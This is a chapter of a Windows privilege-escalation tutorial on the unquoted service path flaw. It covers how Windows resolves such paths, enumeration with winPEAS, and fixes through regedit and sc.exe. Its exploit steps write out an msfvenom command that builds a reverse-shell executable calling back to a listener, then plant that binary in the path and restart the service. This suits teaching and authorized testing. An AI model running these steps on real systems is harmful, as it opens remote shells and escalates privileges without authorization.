8 - Unquoted Service Path
Topics
Introduction to the Windows Shells
Windows Permissions
Reverse Shells in Windows
SeImpersonatePrivilege Exploitation
On Cross Compilation
Windows Services
Weak Service Permissions
Unquoted Service Path
DLL Hijacking
Always Install Elevated
Files with Sensitive Data
Windows Hashes
Stored Credentials and the Windows Vault
Scheduled Task
Critical Registry Paths
Useful Tools
AMSI Bypass
Unquoted Service Path Vulnerability
The unquoted service path vulnerability arises when a Windows service binary's path contains spaces but lacks proper quotation marks. This leads the operating system to search for the service binary using a specific sequence of rules, potentially allowing an attacker to exploit the path traversal behavior.
When starting a service, Windows interprets its binary path as specified in the service configuration. If the path contains spaces and is unquoted, the system checks multiple potential executable paths in order, which can lead to unintended execution.
Example Service Configuration
SERVICE_NAME: SimpleService
BINARY_PATH_NAME: C:\Users\Quickemu\Downloads\Example Directory\Another Directory\simpleService.exeIf the above path is unquoted, Windows will attempt to execute the following binaries in this order:
C:\Users\Quickemu\Downloads\Example.exeC:\Users\Quickemu\Downloads\Example Directory\Another.exeC:\Users\Quickemu\Downloads\Example Directory\Another Directory\simpleService.exe
Attack Scenario
An attacker with write access to any of the intermediary directories can plant a malicious binary, such as Example.exe. When the service starts, Windows will execute the malicious binary instead of the intended service binary.
Exploiting Unquoted Service Paths
Exploit Steps
Identify the Vulnerable Service View the service configuration:
sc.exe qc SimpleServiceCreate a Malicious Binary Generate a reverse shell binary:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.122.1 LPORT=7777 -f exe -o malicious.exePlace the Malicious Binary in a Targeted Path
move malicious.exe "C:\Users\Quickemu\Downloads\Example Directory\Example.exe"Restart the Service
sc.exe stop SimpleService sc.exe start SimpleService
When the service restarts, Windows will execute Example.exe instead of simpleService.exe, effectively hijacking the service.
Additional Examples
Example 1
For the binary path:
C:\Program Files (x86)\Company\Company App\App.exeThe following binaries will be checked in order:
C:\Program.exeC:\Program Files.exeC:\Program Files (x86)\Company\Company.exeC:\Program Files (x86)\Company\Company App\App.exe
Example 2
For the binary path:
C:\Program\Cool Company\Cool Binary.exeThe following binaries will be checked in order:
C:\Program\Cool.exeC:\Program\Cool Company\Cool.exeC:\Program\Cool Company\Cool Binary.exe
Enumeration of Unquoted Service Paths
Using winPEAS
winPEAS can identify unquoted service paths.
.\winPEAS.exe quiet servicesinfoExample Output
Look for the following indicators in the output:
SimpleService(SimpleService)[C:\Users\Quickemu\Downloads\Example Directory\Another\simpleService.exe]
No quotes and Space detected
File Permissions: Quickemu [AllAccess]
Possible DLL Hijacking in binary folder: C:\Users\Quickemu\Downloads\Example Directory (Quickemu [AllAccess])Fixing the Vulnerability
Fix Using RegEdit
Open the Registry Editor (
regedit.exe).Navigate to:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SimpleServiceLocate the
ImagePathkey and add quotes around the binary path:"C:\Users\Quickemu\Downloads\Example Directory\Another Directory\simpleService.exe"
Fix Using sc.exe
Use the sc.exe command to update the service path with quotes:
sc.exe config SimpleService binpath="\"C:\Users\Quickemu\Downloads\Example Directory\Another Directory\simpleService.exe\""Other Resources
Disclaimer
❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!❗
Last updated